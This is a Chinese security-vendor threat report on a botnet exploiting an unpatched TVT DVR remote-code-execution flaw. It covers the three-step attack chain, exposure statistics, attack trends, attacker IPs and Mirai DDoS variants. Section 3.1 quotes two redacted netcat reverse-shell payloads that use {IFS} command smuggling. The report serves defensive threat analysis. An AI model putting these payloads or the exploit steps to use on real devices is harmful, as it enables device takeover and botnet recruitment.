【格物猎踪】“老树新花”——新武器已更新，目标TVT DVR

执行摘要

2019年10月，我们捕获到针对TVT DVR设备的探测活动（《一个月内首现三类漏洞探测活动，僵尸网络又在酝酿攻击？》[1]），其恶意载荷位于POST请求的body中，尝试在DVR上使用nc命令建立一个反向shell（通常针对物联网设备的漏洞探测，僵尸网络会直接投递样本，建立反向shell的攻击行为非常少见）。

近期，我们在排查绿盟威胁捕获系统相关日志的过程中发现，攻击者开始使用新的漏洞[2]感染TVT DVR设备。该漏洞具有较复杂的攻击流程，对捕获系统交互要求极高；恶意载荷经过base64编码，很容易被安全团队遗漏；使用nc命令建立一个反向shell的攻击行为也非常少见。本文将通过脆弱性、暴露情况以及威胁分析三个方面，分析本次捕获到的攻击。

脆弱性分析一节，我们结合互联网公开PoC及捕获到的攻击，分析了攻击者攻击的手法。

暴露情况分析一节，我们结合绿盟威胁情报中心，发现2020年至今，互联网中暴露11648台开放了4567端口的TVT设备。

威胁分析一节，我们分析了2020年1月至今该攻击的趋势，怀疑2020年5月-6月期间，攻击者升级了武器库，对该漏洞的利用进行了微调。另外，大部分反向shell的服务器还在不同程度地参与了扫描探测活动，利用其他漏洞和服务，攻击物联网设备。

截至成稿，我们发现针对该漏洞的利用行为仍非常活跃，官方尚未发布相关补丁修复该漏洞，应引起各方的重视。此次针对TVT DVR漏洞的利用，复杂的攻击流程、base64编码的恶意载荷、建立反向shell的样本投递方法，极大程度隐藏了其样本服务器的信息，无论对捕获系统的交互能力还是对捕获后的分析，都是一种极高考验。

一、脆弱性分析

本次我们捕获到的攻击，漏洞利用（已在github上公开，并无CVE编号）详见公开PoC[2]，目标端口4567/TCP，该漏洞针对深圳 TVT DVR设备，需要注意的是，目前已知79家厂商OEM产品[3]同样存在该问题，有被攻陷的风险。

我们捕获到的攻击过程分为三步：

• 第一步，硬编码脆弱性验证。攻击者向4567/TCP端口发送硬编码的密钥字符串“{D79E94C5-70F0-46BD-965B-E17497CCB598}”。若设备返回“{D79E94C5-70F0-46BD-965B-E17497CCB598}”则说明设备具备脆弱性。
• 第二步，建立反向shell。攻击者发送一条HTTP GET请求，PATH_INFO为：/saveSystemConfig，恶意载荷位于body中，采用base64编码，经解码后即可获得真实的恶意载荷，需要注意的是，不同于普通的僵尸网络触发RCE后会直接执行命令下载样本，该僵尸网络会执行nc命令，尝试建立反向shell连接服务器的31337端口。
• 第三步，服务器下发恶意样本。当僵尸主机使用nc向服务器建立反向shell后，该僵尸网络的服务器会下发相应指令，从另一台服务器下载样本并执行，如图 1.1 所示。

图 1.1 服务器下发样本的过程

此次针对TVT DVR的攻击，复杂的攻击流程、base64编码的恶意载荷、建立反向shell的样本投递方法，极大程度隐藏了其样本服务器的信息，无论对捕获系统的交互能力还是对捕获后的分析，都是一种极高考验。

二、暴露情况分析

通过使用绿盟威胁情报中心对TVT DVR指纹进行搜索，共发现11648条记录（2020年至成稿），暴露且开放了4567/TCP端口的TVT DVR国家分布（前十）情况如图 2.1 所示，可以看出美国和英国的暴露数量明显多于其他国家。

图 2.1 TVT DVR国家分布（前十）情况（2020年1月至7月）

截至2020年7月，我们尚未发现相关厂商公布补丁修复该漏洞，这也是物联网产业链需要面对的问题：产业链过长，若上游的供应商产品存在漏洞，将直接影响下游厂商集成、制造的产品。上游的供应商若不及时提供相关补丁，下游厂商修复其产品的漏洞更是无从谈起。所以治理这种问题，还需要多方的共同努力。

三、威胁分析

3.1攻击趋势

我们对2020年以来，该攻击的次数进行了统计，如图 3.1 所示。发现针对本文所述漏洞的利用总体分为三个区间：

• 2020年1月至2020年4月，该攻击非常活跃。
• 2020年5月-6月，该攻击骤减。
• 2020年7月起，该攻击再次活跃。

图 3.1 攻击次数变化趋势

通过分析恶意载荷，我们怀疑造成2020年5月-6月攻击活动骤减的原因，是攻击者在此期间升级了武器库，微调了建立反向shell的命令：

• 2020年7月前，针对本文所述漏洞的攻击，建立反向shell的载荷为：(nc{IFS}xxx.xxx.xxx.xxx{IFS} 31337{IFS}-e{IFS}SHELL{IFS}&)
• 2020年7月起，针对本文所述漏洞的攻击，建立反向shell的载荷更新为：(nc{IFS}xxx.xxx.xxx.xxx{IFS} 31337{IFS}-e{IFS}/bin/sh&)

最后，我们统计了攻击源数量变化，2020年1月至2020年7月，相同时间段攻击源数量始终在个位数之间波动，但攻击源的总数量超过了20个。我们推测，攻击源数量相对稳定的原因，是攻击者使用了固定的主机利用该漏洞，没有发动僵尸主机参与扫描。而攻击源总数超过20个则说明，针对该漏洞的攻击源交替活跃，并未出现在同一时段爆发的情况。

3.2个别反向shell服务器分析

我们对捕获到的攻击中，反向shell尝试连接的服务器进行了分析，发现大部分反向shell的服务器还在不同程度地利用其他漏洞，攻击物联网设备。其中部分IP需要引起注意：

185.163.46.6，位于摩尔多瓦基希讷乌，从2020年1月起截至成稿，始终保持较高的扫描频率，除了探测本文所述的TVT DVR RCE外，还积极利用以下漏洞攻击物联网设备投递样本：

• 安卓ADB。安卓的ADB服务位于5555端口，针对该服务的攻击参见《攻击物联网设备？黑客钟爱5555端口》[4]。需要注意的是，2020年7月起截止成稿，该IP针对物联网设备的攻击集中在了安卓ADB服务上。
• Netlink GPON RCE。漏洞详情参见EDB-ID：48225[5]。
• MultIPle DrayTek ProductsRCE。漏洞详情参见EDB-ID：48268[6]。
• LILIN DVR 0-day。漏洞详情参见《LILIN DVR 在野0-day漏洞分析报告》[7]。
• MVPower DVR Shell Command Execution。漏洞详情参见EDB-ID：41471[8]。
• NVMS-9000 RCE。漏洞详情参见《一个月内首现三类漏洞探测活动，僵尸网络又在酝酿攻击？》。

185.172.111.235，位于荷兰德伦特省梅珀尔，该IP从6月底开始出现针对本文所述TVT DVR RCE的探测行为，且呈现逐渐上升趋势。该IP还在利用以下漏洞攻击物联网设备投递样本：

• Netlink GPON RCE。漏洞详情参见EDB-ID：48225。
• CVE-2017-8225[9]。该漏洞实际位于GoAhead并且被摄像头的OEM厂商修改，这导致了该脆弱性的产生。漏洞详情参见《Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAMcameras and vulnerabilities in custom http server》[9]。

3.3样本投递

针对TVT DVR漏洞投递的部分样本如下，绿盟威胁情报中心的识别显示部分样本为Mirai家族的变种。说明部分蠕虫家族已经更新其漏洞库，对这些设备发动攻击。

表3.1 部分样本源文件名与SHA256

这些样本基于公开的蠕虫源码进行开发，并针对攻击者的需求进行了一些修改，针对物联网漏洞的扫描模块在样本中被去除。DDoS攻击模块进行了较多的改动，在Mirai原版的10种攻击模式上，额外增加达到了19种攻击模块。

图 3.2 中，我们对Cutie.arm7中发现的攻击模块与其他样本中包含的部分进行比对，蓝色框标记的是原版Mirai包含的10种攻击模块，绿色标记的是我们在其他Mirai变种中曾经发现过的攻击模块，红色标记的是在本次样本中发现的攻击模块，这些攻击模块都是通过不同的模式构造大量数据包对目标IP发送大量请求。值得一提的是，在这些新增的攻击模式中，tcpstorm、udprandom、tcp、ovh攻击模块，攻击者创建了SOCK_RAW类型的socket并手动构造TCP、UDP数据包进行发送，体现出攻击者有较强的编码能力，且对DDoS攻击防护有一定的对抗能力。

图 3.2 样本中包含的攻击模块

3.4其他IoC

反向shell服务器

URLS

扫描源

参考文献

[1]魏佩儒. 一个月内首现三类漏洞探测活动，僵尸网络又在酝酿攻击. https://mp.weixin.qq.com/s/gAJPQxwRVORJ2_FNVSWf0Q

[2]mcw0. TVT-PoC. https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

[3]John Honovich. A List Of TVT's 79 DVR OEMs. https://ipvm.com/forums/video-surveillance/topics/a-list-of-tvt-s-79-dvr-oems

[4]魏佩儒. 攻击物联网设备？黑客钟爱5555端口. https://mp.weixin.qq.com/s/N9LXoSRcxOStu37gdHSnzw

[5]ExploitDB. Netlink GPON Router 1.0.11 - Remote Code Execution . https://www.exploit-db.com/exploits/48225

[6]ExploitDB. MultIPle DrayTek Products - Pre-authentication Remote Root Code Execution. https://www.exploit-db.com/exploits/48268

[7]延龙, 涂凌鸣, 叶根深, 刘宏达. LILIN DVR 在野0-day漏洞分析报告, https://blog.netlab.360.com/multIPle-botnets-are-spreading-using-lilin-dvr-0-day/

[8]ExploitDB. MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Command Execution. https://www.exploit-db.com/exploits/41471

[9]Pierre. Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server. https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html#pre-auth-info-leak-goahead

关于格物实验室

格物实验室专注于工业互联网、物联网和车联网三大业务场景的安全研究。 致力于以场景为导向，智能设备为中心的漏洞挖掘、研究与安全分析，关注物联网资产、漏洞、威胁分析。目前已发布多篇研究报告，包括《物联网安全白皮书》、《物联网安全年报2017》、《物联网安全年报2018》、《物联网安全年报2019》、《国内物联网资产的暴露情况分析》、《智能设备安全分析手册》等。与产品团队联合推出绿盟物联网安全风控平台，定位运营商行业物联网卡的风险管控；推出固件安全检测平台，以便快速发现设备中可能存在的漏洞，以避免因弱口令、溢出等漏洞引起设备控制权限的泄露。

关于伏影实验室

伏影实验室专注于安全威胁与监测技术研究。 研究目标包括僵尸网络威胁，DDoS对抗，WEB对抗，流行服务系统脆弱利用威胁、身份认证威胁，数字资产威胁，黑色产业威胁及新兴威胁。通过掌控现网威胁来识别风险，缓解威胁伤害，为威胁对抗提供决策支撑。

伏影实验室威胁捕获系统

伏网络安全发展至今特别是随着威胁情报的兴起和虚拟化技术的不断发展，欺骗技术也越来越受到各方的关注。欺骗技术就是威胁捕获系统关键技术之一。它的高保真、高质量、鲜活性等特征，使之成为研究敌人的重要手段，同时实时捕获一手威胁时间不再具有滞后性，非常适合威胁情报的时效性需求。

绿盟伏影实验室于2017年中旬运营了一套威胁捕获系统，发展至今已逐步成熟，感知节点遍布世界五大洲，覆盖了20多个国家，覆盖常见服务、IOT服务，工控服务等。形成了以全端口模拟为基础，智能交互服务为辅的混合型感知架构，每天从互联网中捕获大量的鲜活威胁情报，实时感知威胁。

内容编辑：魏佩儒、张浩然 数据支持：张星、桑鸿庆、周鸿屹 责任编辑：王星凯